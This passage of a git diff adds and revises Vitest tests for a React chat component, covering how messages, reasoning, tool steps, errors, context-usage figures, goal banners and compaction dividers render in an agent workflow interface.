+  it('preserves UNC file URL hosts for Windows network paths', () => {
+    expect(getRenderableFileUrl('file://server/share/channel%20image.png')).toBe(
+      '/api/file/download?path=%2F%2Fserver%2Fshare%2Fchannel%20image.png',
+    );
+  });
+
   it('leaves browser-readable URLs unchanged', () => {
     expect(getRenderableFileUrl('https://example.com/image.png')).toBe('https://example.com/image.png');
     expect(getRenderableFileUrl('data:image/png;base64,abc')).toBe('data:image/png;base64,abc');
@@ -312,13 +523,12 @@ describe('getRenderableFileUrl', () => {
 });
 
 describe('getUserAvatarContainerClassName', () => {
-  it('moves the user avatar to the bubble side without affecting bubble spacing', () => {
+  it('keeps the user avatar inside the message row', () => {
     const className = getUserAvatarContainerClassName(false);
 
-    expect(className).toContain('absolute');
-    expect(className).toContain('left-full');
-    expect(className).toContain('ml-2.5');
-    expect(className).toContain('translate-y-1/2');
+    expect(className).toContain('flex-shrink-0');
+    expect(className).not.toContain('absolute');
+    expect(className).not.toContain('left-full');
     expect(className).toContain('h-8');
   });
 
@@ -328,12 +538,12 @@ describe('getUserAvatarContainerClassName', () => {
 });
 
 describe('getUserAvatarSpacerClassName', () => {
-  it('uses a shorter spacer in full layout to keep the top gap compact', () => {
-    expect(getUserAvatarSpacerClassName(false)).toBe('h-4');
+  it('does not reserve out-of-flow space in full layout', () => {
+    expect(getUserAvatarSpacerClassName(false)).toBe('h-0');
   });
 
-  it('uses a proportional spacer in compact layout', () => {
-    expect(getUserAvatarSpacerClassName(true)).toBe('h-3.5');
+  it('does not reserve out-of-flow space in compact layout', () => {
+    expect(getUserAvatarSpacerClassName(true)).toBe('h-0');
   });
 });
 
@@ -375,6 +585,50 @@ describe('SessionChat standalone thinking indicator', () => {
   });
 });
 
+describe('SessionChat instruction display text', () => {
+  it('renders metadata displayText while keeping the raw prompt out of the bubble', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'user-instruction',
+          role: 'user',
+          parts: [{
+            id: 'user-instruction-part',
+            type: 'text',
+            text: 'Please read guide.md and generate the full workflow configuration.',
+            metadata: { displayText: '@@flocks-instruction:智能配置' },
+          }] as Message['parts'],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    expect(screen.getByText('智能配置')).toBeInTheDocument();
+    expect(screen.queryByText(/Please read guide\.md/)).not.toBeInTheDocument();
+  });
+});
+
+describe('SessionChat composer controls', () => {
+  it('keeps the disabled send button visible in dark mode', () => {
+    const { container } = render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    const disabledButtons = Array.from(container.querySelectorAll('button:disabled'));
+    const sendButton = disabledButtons.find((button) => button.querySelector('svg'));
+
+    expect(sendButton?.className).toContain('dark:bg-[#46515e]');
+    expect(sendButton?.className).toContain('dark:text-[#b8c2cc]');
+    expect(sendButton?.className).toContain('dark:border-[#5a6573]');
+  });
+});
+
 describe('shouldRenderMessage', () => {
   it('keeps active empty assistant messages eligible for the thinking indicator', () => {
     expect(shouldRenderMessage(makeMessage({
@@ -403,6 +657,409 @@ describe('shouldRenderMessage', () => {
       error: { code: 'SessionError', message: 'Provider failed' },
     }))).toBe(true);
   });
+
+  it('hides stopped assistant messages that only contain punctuation reasoning', () => {
+    expect(shouldRenderMessage(makeMessage({
+      id: 'assistant-dot',
+      role: 'assistant',
+      finish: 'stop',
+      parts: [
+        {
+          id: 'part-dot',
+          messageID: 'assistant-dot',
+          sessionID: 'sess-1',
+          type: 'reasoning',
+          text: '.',
+        } as any,
+      ],
+    }))).toBe(false);
+  });
+});
+
+describe('getRenderableThinkingText', () => {
+  it('filters punctuation-only reasoning previews', () => {
+    expect(getRenderableThinkingText({ type: 'reasoning', text: '.' } as any)).toBe('');
+    expect(getRenderableThinkingText({ type: 'reasoning', text: '。' } as any)).toBe('');
+  });
+
+  it('keeps meaningful reasoning text', () => {
+    expect(getRenderableThinkingText({ type: 'reasoning', text: '需要更新 todo 状态' } as any)).toBe('需要更新 todo 状态');
+  });
+});
+
+describe('getMessageErrorText', () => {
+  it('prefers user-facing display messages over raw provider errors', () => {
+    expect(getMessageErrorText(makeMessage({
+      id: 'assistant-error',
+      error: {
+        message: 'Connection error.',
+        data: {
+          displayMessage: 'Model is unavailable. Please check the provider connection and model configuration.',
+          message: 'Connection error.',
+        },
+      } as any,
+    }))).toBe('Model is unavailable. Please check the provider connection and model configuration.');
+  });
+
+  it('extracts nested provider error messages', () => {
+    expect(getMessageErrorText(makeMessage({
+      id: 'assistant-error',
+      error: {
+        name: 'APIConnectionError',
+        data: { message: 'Connection error.' },
+      } as any,
+    }))).toBe('Connection error.');
+  });
+
+  it('falls back to the error code', () => {
+    expect(getMessageErrorText(makeMessage({
+      id: 'assistant-error',
+      error: { code: 'SessionError' } as any,
+    }))).toBe('SessionError');
+  });
+});
+
+describe('SessionChat error rendering', () => {
+  it('renders empty assistant error messages instead of the thinking indicator', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'assistant-error',
+          role: 'assistant',
+          parts: [],
+          finish: 'error',
+          error: {
+            name: 'APIConnectionError',
+            data: { message: 'Connection error.' },
+          } as any,
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    const { container } = render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    expect(screen.getByText('Connection error.')).toBeInTheDocument();
+    expect(container.querySelectorAll('.animate-bounce')).toHaveLength(0);
+  });
+});
+
+describe('SessionChat intermediate process collapse', () => {
+  it('collapses reasoning and tool steps by default in embedded workflow panels', async () => {
+    const user = userEvent.setup();
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'assistant-process',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'reason-1',
+              messageID: 'assistant-process',
+              sessionID: 'sess-1',
+              type: 'reasoning',
+              text: '需要先读取工作流文件',
+            } as any,
+            {
+              id: 'tool-1',
+              messageID: 'assistant-process',
+              sessionID: 'sess-1',
+              type: 'tool',
+              tool: 'read',
+              callID: 'call-1',
+              state: {
+                status: 'completed',
+                input: { filePath: 'workflow.md' },
+                output: 'workflow content',
+              },
+            } as any,
+            {
+              id: 'text-1',
+              messageID: 'assistant-process',
+              sessionID: 'sess-1',
+              type: 'text',
+              text: '已读取当前 workflow.md。',
+            } as any,
+          ],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, {
+      sessionId: 'sess-1',
+      display: { collapseIntermediateSteps: true },
+    }));
+
+    const processGroup = screen.getByTestId('chat-process-group') as HTMLDetailsElement;
+    expect(processGroup.open).toBe(false);
+    expect(screen.getByText('过程（2 项）')).toBeInTheDocument();
+    expect(screen.getByText('1 段思考 · 1 次工具调用')).toBeInTheDocument();
+    expect(screen.getByText('已读取当前 workflow.md。')).toBeInTheDocument();
+
+    await user.click(screen.getByText('过程（2 项）'));
+
+    expect(processGroup.open).toBe(true);
+    expect(screen.getByText('read')).toBeInTheDocument();
+  });
+
+  it('renders collapsed process groups inside the full compact assistant column', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'assistant-process-width',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'reason-width',
+              messageID: 'assistant-process-width',
+              sessionID: 'sess-1',
+              type: 'reasoning',
+              text: '需要先读取当前工作流',
+            } as any,
+            {
+              id: 'tool-width',
+              messageID: 'assistant-process-width',
+              sessionID: 'sess-1',
+              type: 'tool',
+              tool: 'read',
+              callID: 'call-width',
+              state: {
+                status: 'running',
+                input: { filePath: 'workflow.md' },
+              },
+            } as any,
+          ],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, {
+      sessionId: 'sess-1',
+      display: { collapseIntermediateSteps: true },
+    }));
+
+    const processGroup = screen.getByTestId('chat-process-group');
+    expect(processGroup.closest('.w-full.max-w-full')).not.toBeNull();
+  });
+
+  it('can default grouped process details open without locking user toggles', async () => {
+    const user = userEvent.setup();
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'assistant-process-open',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'reason-open',
+              messageID: 'assistant-process-open',
+              sessionID: 'sess-1',
+              type: 'reasoning',
+              text: '先分析当前会话',
+            } as any,
+            {
+              id: 'tool-open',
+              messageID: 'assistant-process-open',
+              sessionID: 'sess-1',
+              type: 'tool',
+              tool: 'read',
+              callID: 'call-open',
+              state: {
+                status: 'completed',
+                input: { filePath: 'session.json' },
+                output: 'ok',
+              },
+            } as any,
+          ],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, {
+      sessionId: 'sess-1',
+      display: { collapseIntermediateSteps: true, processGroupsDefaultOpen: true },
+    }));
+
+    const processGroup = screen.getByTestId('chat-process-group') as HTMLDetailsElement;
+    expect(processGroup.open).toBe(true);
+
+    await user.click(screen.getByText('过程（2 项）'));
+
+    expect(processGroup.open).toBe(false);
+  });
+
+  it('does not split collapsed process groups on invisible step markers', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'assistant-process-1',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'reason-1',
+              messageID: 'assistant-process-1',
+              sessionID: 'sess-1',
+              type: 'reasoning',
+              text: '先读取 workflow.md',
+            } as any,
+            {
+              id: 'tool-1',
+              messageID: 'assistant-process-1',
+              sessionID: 'sess-1',
+              type: 'tool',
+              tool: 'read',
+              callID: 'call-1',
+              state: {
+                status: 'completed',
+                input: { filePath: 'workflow.md' },
+                output: 'workflow content',
+              },
+            } as any,
+            {
+              id: 'empty-text-1',
+              messageID: 'assistant-process-1',
+              sessionID: 'sess-1',
+              type: 'text',
+              text: '',
+            } as any,
+          ],
+        }),
+        makeMessage({
+          id: 'assistant-process-2',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'step-start-1',
+              messageID: 'assistant-process-2',
+              sessionID: 'sess-1',
+              type: 'step-start',
+            } as any,
+            {
+              id: 'reason-2',
+              messageID: 'assistant-process-2',
+              sessionID: 'sess-1',
+              type: 'thinking',
+              text: '再生成 workflow.json',
+            } as any,
+            {
+              id: 'tool-2',
+              messageID: 'assistant-process-2',
+              sessionID: 'sess-1',
+              type: 'tool',
+              tool: 'write',
+              callID: 'call-2',
+              state: {
+                status: 'completed',
+                input: { filePath: 'workflow.json' },
+                output: 'ok',
+              },
+            } as any,
+            {
+              id: 'step-finish-1',
+              messageID: 'assistant-process-2',
+              sessionID: 'sess-1',
+              type: 'step-finish',
+            } as any,
+          ],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, {
+      sessionId: 'sess-1',
+      display: { collapseIntermediateSteps: true },
+    }));
+
+    expect(screen.getAllByTestId('chat-process-group')).toHaveLength(1);
+    expect(screen.getByText('过程（4 项）')).toBeInTheDocument();
+    expect(screen.getByText('2 段思考 · 2 次工具调用')).toBeInTheDocument();
+  });
+
+  it('keeps the compact compaction bubble at the full assistant column width', async () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'user-before-compaction',
+          role: 'user',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'user-text',
+              messageID: 'user-before-compaction',
+              sessionID: 'sess-1',
+              type: 'text',
+              text: '继续优化工作流',
+            } as any,
+          ],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, {
+      sessionId: 'sess-1',
+      live: true,
+      display: { collapseIntermediateSteps: true },
+    }));
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.status',
+        properties: {
+          sessionID: 'sess-1',
+          status: { type: 'compacting', message: '正在压缩上下文...' },
+        },
+      });
+    });
+
+    const compactionText = await screen.findByText('正在压缩上下文...');
+    expect(compactionText.closest('.w-full.max-w-full')).not.toBeNull();
+  });
 });
 
 describe('SessionChat agent mentions', () => {
@@ -464,6 +1121,28 @@ describe('SessionChat agent mentions', () => {
     });
   });
 
+  it('uses the selected agent when creating a session from the first message', async () => {
+    const user = userEvent.setup();
+    const onCreateAndSend = vi.fn().mockResolvedValue('sess-created');
+    render(React.createElement(SessionChat, {
+      sessionId: null,
+      agentName: 'explore',
+      mentionAgents,
+      onCreateAndSend,
+    }));
+
+    await user.type(screen.getByPlaceholderText('请输入消息'), 'summarize this file{enter}');
+
+    await waitFor(() => {
+      expect(onCreateAndSend).toHaveBeenCalledWith(
+        'summarize this file',
+        [],
+        'explore',
+        undefined,
+      );
+    });
+  });
+
   it('queues streaming messages to the mentioned agent', async () => {
     const user = userEvent.setup();
     render(React.createElement(SessionChat, {
@@ -612,16 +1291,453 @@ describe('ChatToolPart todo rendering', () => {
       }),
     );
 
-    expect(container.textContent).toContain('Progress 1/3 · In progress 1');
+    expect(container.textContent).toContain('进度 1/3 · 进行中 1');
     expect(container.textContent).toContain('Todo 阶段');
     expect(container.textContent).toContain('定位 todo 摘要问题中');
-    expect(container.textContent).toContain('completed');
+    expect(container.textContent).toContain('完成');
+    expect(container.textContent).not.toContain('completed');
     expect(container.textContent).not.toContain('输入参数');
     expect(container.textContent).not.toContain('输出结果');
     expect(container.textContent).not.toContain('[object Object]');
   });
 });
 
+describe('SessionChat context usage popover', () => {
+  it('always shows fixed usage rows and hides compacted history', async () => {
+    const user = userEvent.setup();
+    sessionApiGetContextUsageMock.mockResolvedValue({
+      sessionID: 'sess-1',
+      usedTokens: 120,
+      contextWindow: 1000,
+      percent: 12,
+      source: 'estimated',
+      estimatedTokens: 120,
+      compactedTokens: 0,
+      segments: [
+        { key: 'systemPrompt', tokens: 80, included: true, source: 'estimated' },
+        { key: 'agentDelegation', tokens: 0, included: true, source: 'estimated' },
+      ],
+      excludedSegments: [
+        { key: 'compactedHistory', tokens: 12000, included: false, source: 'estimated' },
+      ],
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    const contextButton = await screen.findByRole('button', { name: 'chat.contextUsageTitle' });
+    expect(contextButton).toHaveClass('h-6', 'w-6');
+    await user.click(contextButton);
+
+    expect(screen.getByText('System prompt')).toBeInTheDocument();
+    expect(screen.getByText('Tool definitions')).toBeInTheDocument();
+    expect(screen.getByText('Conversation')).toBeInTheDocument();
+    expect(screen.getByText('Reasoning')).toBeInTheDocument();
+    expect(screen.getByText('Tool calls')).toBeInTheDocument();
+    expect(screen.getByText('Skill loads')).toBeInTheDocument();
+    expect(screen.getByText('Agent delegation')).toBeInTheDocument();
+    expect(screen.getAllByText('0').length).toBeGreaterThanOrEqual(4);
+    expect(screen.queryByText('Compacted history')).not.toBeInTheDocument();
+  });
+
+  it('keeps usage visible while recalculating after compaction succeeds', async () => {
+    const user = userEvent.setup();
+    sessionApiGetContextUsageMock
+      .mockResolvedValueOnce({
+        sessionID: 'sess-1',
+        usedTokens: 900,
+        contextWindow: 1000,
+        percent: 90,
+        source: 'estimated',
+        estimatedTokens: 900,
+        compactedTokens: 0,
+        segments: [
+          { key: 'conversation', tokens: 900, included: true, source: 'estimated' },
+        ],
+        excludedSegments: [],
+      })
+      .mockResolvedValueOnce({
+        sessionID: 'sess-1',
+        usedTokens: 420,
+        contextWindow: 1000,
+        percent: 42,
+        source: 'estimated',
+        estimatedTokens: 420,
+        compactedTokens: 0,
+        segments: [
+          { key: 'conversation', tokens: 420, included: true, source: 'estimated' },
+        ],
+        excludedSegments: [],
+      });
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'stale-user',
+          role: 'user',
+          parts: [{ id: 'stale-user-part', type: 'text', text: 'x'.repeat(4000) }] as Message['parts'],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    const contextButton = await screen.findByRole('button', { name: 'chat.contextUsageTitle' });
+    await user.click(contextButton);
+    expect(await screen.findByText('Conversation')).toBeInTheDocument();
+    expect(screen.getByText('900')).toBeInTheDocument();
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'context.compacted',
+        properties: { sessionID: 'sess-1' },
+      });
+    });
+
+    expect(screen.getByText('900')).toBeInTheDocument();
+    await waitFor(() => {
+      expect(screen.getByText('420')).toBeInTheDocument();
+    });
+    expect(screen.getByText('Conversation')).toBeInTheDocument();
+  });
+
+  it('refreshes context usage after compaction fails', async () => {
+    const user = userEvent.setup();
+    const onError = vi.fn();
+    sessionApiGetContextUsageMock
+      .mockResolvedValueOnce({
+        sessionID: 'sess-1',
+        usedTokens: 900,
+        contextWindow: 1000,
+        percent: 90,
+        source: 'estimated',
+        estimatedTokens: 900,
+        compactedTokens: 0,
+        segments: [
+          { key: 'conversation', tokens: 900, included: true, source: 'estimated' },
+        ],
+        excludedSegments: [],
+      })
+      .mockResolvedValueOnce({
+        sessionID: 'sess-1',
+        usedTokens: 420,
+        contextWindow: 1000,
+        percent: 42,
+        source: 'estimated',
+        estimatedTokens: 420,
+        compactedTokens: 0,
+        segments: [
+          { key: 'conversation', tokens: 420, included: true, source: 'estimated' },
+        ],
+        excludedSegments: [],
+      });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true, onError }));
+
+    await waitFor(() => {
+      expect(sessionApiGetContextUsageMock).toHaveBeenCalledTimes(1);
+    });
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.status',
+        properties: {
+          sessionID: 'sess-1',
+          status: { type: 'compacting', message: 'Compacting context…' },
+        },
+      });
+    });
+    const contextButton = await screen.findByRole('button', { name: 'chat.contextUsageTitle' });
+    await user.click(contextButton);
+    expect(screen.getByText('900')).toBeInTheDocument();
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.error',
+        properties: {
+          sessionID: 'sess-1',
+          error: { message: 'provider unavailable' },
+        },
+      });
+    });
+
+    await waitFor(() => {
+      expect(sessionApiGetContextUsageMock).toHaveBeenCalledTimes(2);
+    });
+    expect(onError).toHaveBeenCalledWith('provider unavailable');
+
+    expect(screen.getByText('420')).toBeInTheDocument();
+  });
+
+  it('does not refetch immediately after a pushed context usage snapshot', async () => {
+    sessionApiGetContextUsageMock.mockResolvedValueOnce({
+      sessionID: 'sess-1',
+      usedTokens: 900,
+      contextWindow: 1000,
+      percent: 90,
+      source: 'estimated',
+      estimatedTokens: 900,
+      compactedTokens: 0,
+      segments: [
+        { key: 'conversation', tokens: 900, included: true, source: 'estimated' },
+      ],
+      excludedSegments: [],
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    await waitFor(() => {
+      expect(sessionApiGetContextUsageMock).toHaveBeenCalledTimes(1);
+    });
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'context.usage.updated',
+        properties: {
+          sessionID: 'sess-1',
+          usedTokens: 420,
+          contextWindow: 1000,
+          percent: 42,
+          source: 'estimated',
+          estimatedTokens: 420,
+          compactedTokens: 0,
+          segments: [
+            { key: 'conversation', tokens: 420, included: true, source: 'estimated' },
+          ],
+          excludedSegments: [],
+        },
+      });
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.status',
+        properties: {
+          sessionID: 'sess-1',
+          status: { type: 'idle' },
+        },
+      });
+    });
+
+    expect(sessionApiGetContextUsageMock).toHaveBeenCalledTimes(1);
+  });
+});
+
+describe('SessionChat goal banner', () => {
+  it('hydrates a persisted goal banner when the session loads', async () => {
+    sessionApiGetMock.mockResolvedValue({
+      id: 'sess-1',
+      goal: {
+        status: 'active',
+        objective: 'List built-in tools',
+      },
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    expect(await screen.findByText('Goal')).toBeInTheDocument();
+    expect(screen.getByText('List built-in tools')).toBeInTheDocument();
+    expect(sessionApiGetMock).toHaveBeenCalledWith('sess-1');
+  });
+
+  it('shows goal status updates and lets the user dismiss the current notice', async () => {
+    const user = userEvent.setup();
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.goal.updated',
+        properties: {
+          sessionID: 'sess-1',
+          status: 'active',
+          objective: 'List built-in tools',
+        },
+      });
+    });
+
+    expect(await screen.findByText('Goal')).toBeInTheDocument();
+    expect(screen.getByText('List built-in tools')).toBeInTheDocument();
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.goal.updated',
+        properties: {
+          sessionID: 'sess-1',
+          status: 'completed',
+          objective: 'List built-in tools',
+          reason: 'Goal complete: tools listed',
+        },
+      });
+    });
+
+    expect(await screen.findByText('Completed')).toBeInTheDocument();
+    expect(screen.getByText('List built-in tools')).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: 'Dismiss goal notice' }));
+
+    expect(screen.queryByText('Completed')).not.toBeInTheDocument();
+    expect(screen.queryByText('List built-in tools')).not.toBeInTheDocument();
+  });
+
+  it('keeps a dismissed persisted goal hidden after remount', async () => {
+    const user = userEvent.setup();
+    sessionApiGetMock.mockResolvedValue({
+      id: 'sess-1',
+      goal: {
+        status: 'completed',
+        objective: 'List built-in tools',
+        reason: 'Goal complete: tools listed',
+      },
+    });
+
+    const view = render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    expect(await screen.findByText('Completed')).toBeInTheDocument();
+    await user.click(screen.getByRole('button', { name: 'Dismiss goal notice' }));
+    expect(screen.queryByText('Completed')).not.toBeInTheDocument();
+    expect(window.localStorage.getItem('flocks:session:sess-1:dismissedGoal')).toBe(
+      'completed:List built-in tools',
+    );
+
+    view.unmount();
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    await waitFor(() => {
+      expect(sessionApiGetMock).toHaveBeenCalledTimes(2);
+      expect(screen.queryByText('Completed')).not.toBeInTheDocument();
+    });
+    expect(screen.queryByText('List built-in tools')).not.toBeInTheDocument();
+  });
+
+  it('shows a new goal even when a previous goal was dismissed', async () => {
+    const user = userEvent.setup();
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.goal.updated',
+        properties: {
+          sessionID: 'sess-1',
+          status: 'completed',
+          objective: 'List built-in tools',
+        },
+      });
+    });
+    expect(await screen.findByText('Completed')).toBeInTheDocument();
+    await user.click(screen.getByRole('button', { name: 'Dismiss goal notice' }));
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.goal.updated',
+        properties: {
+          sessionID: 'sess-1',
+          status: 'active',
+          objective: 'Calculate 4+87',
+        },
+      });
+    });
+
+    expect(await screen.findByText('Goal')).toBeInTheDocument();
+    expect(screen.getByText('Calculate 4+87')).toBeInTheDocument();
+  });
+});
+
+describe('SessionChat compaction divider', () => {
+  it('keeps archived history visible before the compressed-context divider', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'old-user',
+          role: 'user',
+          compacted: true,
+          parts: [{ id: 'old-user-part', type: 'text', text: 'old visible request' }] as Message['parts'],
+        }),
+        makeMessage({
+          id: 'summary-1',
+          role: 'assistant',
+          finish: 'summary',
+          parts: [],
+        }),
+        makeMessage({
+          id: 'assistant-1',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [{ id: 'assistant-1-part', type: 'text', text: 'current answer' }] as Message['parts'],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    const dividerLabel = screen.getByText('上下文已压缩');
+    expect(dividerLabel).toBeInTheDocument();
+    expect(dividerLabel).not.toHaveClass('rounded-full');
+    expect(dividerLabel).not.toHaveClass('border');
+    expect(dividerLabel).not.toHaveClass('bg-white');
+    expect(screen.getByText('old visible request')).toBeInTheDocument();
+    expect(screen.getByText('current answer')).toBeInTheDocument();
+  });
+
+  it('renders one chronological divider for each summary message', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'old-user',
+          role: 'user',
+          compacted: true,
+          parts: [{ id: 'old-user-part', type: 'text', text: 'first archived turn' }] as Message['parts'],
+        }),
+        makeMessage({
+          id: 'summary-1',
+          role: 'assistant',
+          finish: 'summary',
+          parts: [],
+        }),
+        makeMessage({
+          id: 'middle-user',
+          role: 'user',
+          compacted: true,
+          parts: [{ id: 'middle-user-part', type: 'text', text: 'second archived turn' }] as Message['parts'],
+        }),
+        makeMessage({
+          id: 'summary-2',
+          role: 'assistant',
+          finish: 'summary',
+          parts: [],
+        }),
+        makeMessage({
+          id: 'assistant-1',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [{ id: 'assistant-1-part', type: 'text', text: 'current answer' }] as Message['parts'],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    expect(screen.getByText('first archived turn')).toBeInTheDocument();
+    expect(screen.getByText('second archived turn')).toBeInTheDocument();
+    expect(screen.getAllByText('上下文已压缩')).toHaveLength(2);
+  });
+});
+
 describe('getRegenerateTruncateTarget', () => {
   it('truncates back to the parent user message for assistant regenerations', () => {
     const target = getRegenerateTruncateTarget([
@@ -658,6 +1774,177 @@ describe('shouldRefetchFinishedMessage', () => {
   });
 });
 
+describe('streaming activity helpers', () => {
+  it('detects pending and running tool parts as active', () => {
+    expect(hasActiveToolPart([
+      { id: 'tool-1', type: 'tool', state: { status: 'pending' } } as Message['parts'][number],
+    ])).toBe(true);
+    expect(hasActiveToolPart([
+      { id: 'tool-1', type: 'tool', state: { status: 'running' } } as Message['parts'][number],
+    ])).toBe(true);
+  });
+
+  it('does not treat completed or error tool parts as active', () => {
+    expect(hasActiveToolPart([
+      { id: 'tool-1', type: 'tool', state: { status: 'completed' } } as Message['parts'][number],
+      { id: 'tool-2', type: 'tool', state: { status: 'error' } } as Message['parts'][number],
+    ])).toBe(false);
+  });
+
+  it('keeps busy, compacting, and retry session statuses active', () => {
+    expect(isActiveSessionStatus({ type: 'busy' })).toBe(true);
+    expect(isActiveSessionStatus({ type: 'compacting' })).toBe(true);
+    expect(isActiveSessionStatus({ type: 'retry' })).toBe(true);
+    expect(isActiveSessionStatus({ type: 'idle' })).toBe(false);
+    expect(isActiveSessionStatus(undefined)).toBe(false);
+  });
+});
+
+describe('SessionChat fallback polling', () => {
+  it('does not finish streaming while fetched messages still contain a running tool', async () => {
+    vi.useFakeTimers();
+    const refetch = vi.fn();
+    const onStreamingDone = vi.fn();
+    try {
+      useSessionMessagesMock.mockReturnValue({
+        messages: [
+          makeMessage({
+            id: 'assistant-1',
+            finish: 'tool-calls',
+            parts: [
+              { id: 'tool-1', type: 'tool', state: { status: 'running' } } as Message['parts'][number],
+            ],
+          }),
+        ],
+        loading: false,
+        refetch,
+        addMessage: vi.fn(),
+        updateMessage: vi.fn(),
+        updateMessagePart: vi.fn(),
+        replaceMessageText: vi.fn(),
+        truncateAfterMessage: vi.fn(),
+      });
+      clientGetMock.mockResolvedValueOnce({
+        data: [
+          {
+            info: {
+              id: 'assistant-1',
+              sessionID: 'sess-1',
+              role: 'assistant',
+              finish: 'tool-calls',
+            },
+            parts: [
+              { id: 'tool-1', type: 'tool', state: { status: 'running' } },
+            ],
+          },
+        ],
+      });
+
+      render(React.createElement(SessionChat, {
+        sessionId: 'sess-1',
+        live: true,
+        onStreamingDone,
+      }));
+      act(() => {
+        useSSEOptionsRef.current.onEvent({
+          type: 'session.status',
+          properties: { sessionID: 'sess-1', status: { type: 'busy' } },
+        });
+      });
+
+      await vi.advanceTimersByTimeAsync(5_000);
+
+      expect(refetch).not.toHaveBeenCalled();
+      expect(onStreamingDone).not.toHaveBeenCalled();
